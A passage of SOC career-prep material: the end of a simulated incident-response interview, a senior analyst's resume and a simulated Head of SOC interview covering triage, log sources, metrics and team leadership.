Interviewer: Have you worked on automating any part of the IR process?

Candidate: Yes. I created Python scripts that automatically enrich alerts with WHOIS and
VirusTotal data. We also used SOAR (via Cortex XSOAR) to auto-isolate hosts upon
confirmed IOC match, notify stakeholders and open a ticket in the IR queue.

Interviewer: How do you handle IR in a hybrid cloud environment?

Candidate:

• For Azure: Review Audit Logs, Defender for Cloud alerts and AAD sign-ins
• For AWS: Use CloudTrail, GuardDuty and IAM role history
• Investigate IAM abuse, misconfigurations and lateral movement using CLI logs
• I ensure all IR actions are cloud-safe (e.g., acquiring volatile logs via APIs instead of
snapshots where possible)

SECTION 4: SCENARIO-BASED WALKTHROUGH

Interviewer: Let’s do a walkthrough. A user reports their PC is running slow. EDR shows
rundll32.exe spawning PowerShell that connects to an IP in Russia. What do you do?

Candidate:
 1. Triage the Alert:
o Validate the alert with EDR: check parent process, command line, IP
reputation
2. Isolate the Host:
o Immediately isolate via EDR to stop any lateral movement
3. Collect Evidence:
o Take a memory snapshot
o Capture event logs (Sysmon, Security), prefetch and persistence points
4. Investigate:
o Decode PowerShell payload (base64, obfuscation)
o Check for additional persistence (scheduled tasks, registry run keys)
o Trace other connections and domain resolutions
5. Containment:
o Remove malware
o Reset credentials if credential theft is suspected
6. Eradication & Recovery:
o Patch any vulnerabilities exploited
o Reimage if system integrity is questionable
7. RCA & Reporting:
o Deliver detailed MITRE ATT&CK-mapped report
o Share IOCs with SOC and TI teams

Interviewer: What logs would you collect for lateral movement detection?

Candidate:

• Windows Event Logs – Event ID 4624, 4672, 4688

• Sysmon – Event ID 1 (process), 3 (network), 10 (registry), 11 (file create)
• Firewall Logs – RDP, SMB traffic
• DNS Logs – Hostname resolution anomalies
• EDR Logs – Parent-child anomalies, access to wmic, psexec, smbexec

SECTION 5: MALWARE, LOGS, CLOUD & ENDPOINT RESPONSE

Interviewer: If you find lsass.exe being accessed by an unknown process, what would you
do?

Candidate:

• Flag it as potential credential dumping

• Dump memory and scan with YARA for mimikatz or similar signatures
• Review command-line and parent process (e.g., rundll32 or wmic abuse)
• Disable affected user accounts, change passwords, review lateral logs
• Share indicators with detection team and initiate environment-wide sweep
Interviewer: How do you confirm an O365 account was compromised?

Candidate:

• Check AAD sign-ins for unusual geolocation or impossible travel

• Look for forwarding rules or inbox rule manipulation
• Review audit logs for login anomalies and permission changes
• Confirm MFA activity (if present) and token issuance patterns
• Advise password reset, session revocation and log sweep for post-compromise
activity

SECTION 6: COMMUNICATION, COLLABORATION & RCA

Interviewer: How do you coordinate with SOC and threat intel during an ongoing incident?

Candidate:

• Set up an incident channel for live updates

• Provide SOC with updated IOCs and TTPs to refine detections
• Coordinate with TI for any external matching or actor attribution
• Ensure documentation is consistent across teams for RCA purposes

Interviewer: How do you handle pressure during a live incident with senior stakeholders
involved?

Candidate: I stay focused on facts, stick to known data and give frequent, clear updates. I
provide confidence ratings, explain next steps and avoid technical overload when speaking
to non-technical execs. After stabilising the incident, I ensure the RCA is thorough to
prevent recurrence.

SECTION 7: CLOSING & QUESTIONS

Interviewer: Thanks Roy. That concludes the technical part. Do you have any questions for
us?

Candidate: Yes, thank you:

1. How does Cybermir Defence structure the escalation process between L2 and L3
during high-severity incidents?
2. Does the L3 IR role get involved in red team aftermath or purple teaming activities?
3. Is there support for advanced training or certifications like GCIH, GCFA or cloud IR
labs?
CYBERSECURITY ANALYST L3 RESUME

PAUL SCHOLES
Senior Cybersecurity Analyst (L3) | SOC Operations Leader | Threat Response Strategist
Cyberjaya, Malaysia | +60 12-345 6789 | [email protected]
LinkedIn: linkedin.com/in/paulscholes | GitHub: github.com/paulcyber

PROFESSIONAL SUMMARY

Senior Cybersecurity Analyst with 6+ years of SOC operations experience, including

leading incident response, mentoring junior analysts and managing high-severity client
escalations. Proven ability to design and optimise detection content, streamline triage
processes and coordinate response strategies across blue team, engineering and threat
intelligence teams. Seeking to advance into the Head of SOC role to lead people,
processes and platforms toward delivering robust cyber defence capabilities at scale.

CURRENT ROLE

Cybersecurity Analyst – Level 3 (Senior SOC / Incident Response Lead)

IzzmierCyber Defense Sdn Bhd – Kuala Lumpur, Malaysia
Aug 2021 – Present

• Lead technical response for P1 and P2 security incidents across 30+ clients
• Mentor and manage a team of 6 L1/L2 analysts, overseeing daily SOC operations
• Built detection use cases mapped to MITRE ATT&CK, including ransomware, lateral
movement and living-off-the-land attacks
• Designed response playbooks and automated alert enrichment using Cortex XSOAR
and Python
• Coordinated with Threat Intelligence, Cloud Security and Engineering teams during
major IR efforts
• Represented SOC in client review calls and post-incident briefings

Key Achievements:

• Reduced average time-to-containment from 4 hours to 1.5 hours over 12 months

• Developed a SOC metrics dashboard tracking alert volume, analyst workload and MTTR
• Promoted culture of continuous improvement with weekly knowledge-sharing and
threat briefings

PAST ROLE

Cybersecurity Analyst – Level 2 (IR & Threat Detection Focus)

IzzmierCyber Defense Sdn Bhd
Sept 2019 – Aug 2021
 • Investigated malware, phishing, data exfiltration and credential theft cases
• Created and refined detection logic in Splunk and Sentinel
• Delivered technical post-incident reports and MITRE-based threat mappings
• Provided Tier-2 escalation support and worked closely with engineering for rule
tuning

EDUCATION

Bachelor of Information Technology (Networking)

Universiti Teknologi MARA (UiTM), Malaysia
Graduated: 2018 | CGPA: 3.42

CERTIFICATIONS

• GIAC Certified Incident Handler (GCIH)

• CompTIA CySA+ – Cybersecurity Analyst
• Microsoft SC-200 – Security Operations Analyst
• Blue Team Level 2 (BTL2)
• Splunk Core Certified Power User

TECHNICAL SKILLS

SOC Leadership & Reporting

• SOC KPI/OKR development, SLA monitoring

• Shift scheduling, analyst workload balancing
• RCA, SLA deviation reporting, executive summaries

Tools & Platforms

• SIEM: Splunk, Microsoft Sentinel, Wazuh

• EDR: Cortex XDR, SentinelOne, CrowdStrike
• SOAR: Cortex XSOAR, ServiceNow IR
• Threat Intel: VirusTotal, MISP, Group-IB, MITRE ATT&CK

Automation & Scripting

• Python (log parsing, IOC enrichment)

• YAML (Sigma rules), JSON (log format handling)
• Basic KQL and SPL for detection building

LEADERSHIP PROJECTS & INITIATIVES

SOC Process Maturity Framework

 • Assessed current state of SOC capability using NIST CSF & MITRE SOC-CMM
• Designed roadmap for maturity improvement with quarterly goals

L1/L2 Analyst Development Program

• Created a structured skills matrix, weekly hands-on sessions and performance

Interviewerchmarks
• Increased ticket triage accuracy and reduced L3 escalations by 45% in 6 months

Detection Engineering Governance

• Established weekly use case review meetings with TI and detection teams
• Introduced change management protocol for rule lifecycle management

Client Threat Visibility Improvement

• Deployed unified dashboards and reporting for clients using Splunk & Power BI
• Reduced client alert fatigue by tuning use cases based on true positive rates

STAKEHOLDER & TEAM ENGAGEMENT

• Spearheaded red-blue team debriefs post-simulation

• Collaborated with MSSP clients on risk posture improvements
• Represented SOC in RFPs, audits and technical due diligence
• Worked closely with compliance teams to map use cases to ISO 27001/NIST 800-61

SOFT SKILLS & SOC MANAGEMENT STRENGTHS

• Strategic thinker with operational discipline

• Skilled in incident de-escalation and crisis communication
• Excellent mentor and cross-team coordinator
• Adaptable to shifting threat landscapes and SOC models (centralised vs.
distributed)
SIMULATED INTERVIEW WHO IS APPLYING FOR THE POSITION OF HEAD
OF SECURITY OPERATIONS CENTRE (SOC)

SECTION 1: INTRODUCTION & VISION

Interviewer: Hi Paul, thank you for joining us today. Could you start by introducing yourself
and share why you're interested in leading our SOC here at Cybermir Defence?

Candidate (Paul): Thank you. I’m Paul Scholes, currently a Senior Cybersecurity Analyst
(L3) at IzzmierCyber Defense. With over 6 years in cybersecurity, 4 of those in SOC
operations, I’ve led incident response, built use cases, improved alert fidelity and
mentored analysts.
I’m excited by the opportunity at Cybermir Defence because of your multi-sector MSSP
footprint and your growing SOC infrastructure. I believe I can bring not only technical
guidance but also people leadership and strategic direction to scale and mature your SOC.
My vision is to build a proactive, metrics-driven and resilient SOC that operates with
confidence, structure and measurable value.

SECTION 2: CYBERSECURITY FUNDAMENTALS & LEADERSHIP PHILOSOPHY

Interviewer: What do you think are the top three challenges a SOC faces today?

Candidate:

1. Alert fatigue – Too many false positives can demotivate analysts and waste time
2. Talent retention – SOC burnout is real, especially in 24/7 environments
3. Detection quality vs visibility – Many organisations onboard tools but underutilise
them due to poor log management or detection logic

The solution lies in balancing automation, focusing on detection engineering quality and
investing in career paths and analyst development.

Interviewer: As Head of SOC, how would you describe your leadership style?

Candidate: I lead by accountability, clarity and empathy. I believe in defining clear KPIs
and responsibilities, but I also actively listen to the team. I foster a collaborative
environment, ensure they feel supported and give them space to grow. I coach analysts not
just to resolve alerts but to think like investigators and defenders.

SECTION 3: TECHNICAL & OPERATIONAL OVERSIGHT

Interviewer: What’s your experience with SIEM and detection engineering oversight?
Candidate: I’ve worked with Splunk, Sentinel and Wazuh extensively. I led a team that
deployed and maintained 60+ use cases aligned with MITRE ATT&CK. I standardised rule
creation and lifecycle governance, introduced weekly detection review sessions with our
red team and implemented performance dashboards to track true vs. false positive ratios.

Interviewer: What would your first 90 days look like as Head of SOC here?

Candidate: Day 0–30:

• Review SOC maturity using MITRE SOC-CMM or similar framework

• Evaluate current alerting structure, case management flows and SLAs
• Interview the team for pain points and feedback

Day 31–60:

• Optimise detection priorities based on threat landscape

• Improve shift handovers, containment SLAs and collaboration workflows
• Launch analyst training plans and clear escalation flowcharts

Day 61–90:

• Propose a quarterly roadmap with measurable KPIs

• Create a SOC performance scorecard and weekly review rhythm
• Engage with clients for service feedback and build trust

Interviewer: Have you led client escalations before?

Candidate: Yes. As L3, I was the lead for client escalations during major incidents. I
handled technical briefings, wrote post-incident reports and participated in lessons-
learned sessions. I believe in full transparency, owning both our success and our blind
spots.

SECTION 4: SCENARIO-BASED SITUATIONAL LEADERSHIP

Interviewer: A major client is hit by ransomware. SOC misses the early signs. You’ve been
alerted mid-stage. What do you do?

Candidate:

1. Activate incident response protocol – Inform IR lead, isolate impacted systems

immediately
2. Triage the scope – Review logs, EDR and network flow to identify blast radius
3. Contain – Block C2, revoke compromised credentials, isolate endpoints
4. Communicate – Update client with incident timeline, remediation steps and risks
 5. Root Cause – Investigate detection failure, whether due to visibility, logic or alert
routing
6. Post-Mortem – Document RCA, update detection logic, run tabletop to improve
reflexes
7. Internal Check – Have a frank conversation with the SOC team and realign priorities

Interviewer: You discover one of your senior analysts failed to escalate a critical alert that
later turned into a breach. How do you handle it?

Candidate: I handle it constructively but firmly. First, I meet with the analyst privately to
understand context , was it lack of knowledge, pressure or alert fatigue?
Then, I:

• Review SOP clarity and training gaps

• Reinforce escalation thresholds and quality gates
• Use the incident as a learning moment in team retrospectives
It’s not about blame, it’s about accountability and improvement.

SECTION 5: METRICS, MATURITY, REPORTING & GOVERNANCE

Interviewer: What KPIs would you use to measure SOC performance?

Candidate:

• MTTD / MTTR
• True Positive Rate vs. False Positive Rate
• Use Case Coverage vs. Threat Landscape
• Analyst Escalation Accuracy
• Incident SLA Compliance
I’d also track analyst wellness via ticket backlog, after-hours escalations and alert
volume per person.

Interviewer: How would you report SOC value to non-technical stakeholders?

Candidate: Through visual dashboards and narratives.

• Show threat trends, volume of blocked threats and IR turnaround time

• Use a risk lens: "This month, we mitigated 2 privilege escalation attempts that could
have led to data exfiltration"
• Provide a quarterly risk summary tied to business operations (e.g., uptime,
compliance, financial exposure)

SECTION 6: TALENT MANAGEMENT & SHIFT DESIGN

Interviewer: How do you structure your SOC team and shift schedule?

Candidate: I prefer a tierless or hybrid model based on team maturity:

• Analyst Pods: Each pod handles triage + investigation, fostering ownership

• Shift Coverage: 8x3 model with 2–3 analysts per shift, 1 lead per day
• Ensure off-shift escalation protocols are clear
• Rotate roles (threat hunting, detection tuning, QA) to avoid burnout

Interviewer: How do you upskill analysts and reduce turnover?

Candidate:

• Provide a clear career roadmap: from triage to investigation to threat hunting

• Fund certs like SC-200, BTL1, CySA+
• Introduce SOC Olympics – friendly CTFs, detection races, red/blue simulations
• Recognise work publicly and celebrate wins
• Conduct regular 1-on-1s to check morale and unblock development paths

SECTION 7: QUESTIONS FROM CANDIDATE

Interviewer: Thank you, Paul. We’ve reached the end of our questions. Do you have any for
us?

Candidate: Yes, thank you:

1. How mature is Cybermir Defence’s SOC today in terms of coverage, automation

and playbook use?
2. What are the top three goals you'd want your new Head of SOC to achieve in the first
6 months?
3. Is there opportunity to collaborate across red team or CTI to improve detection
strategy?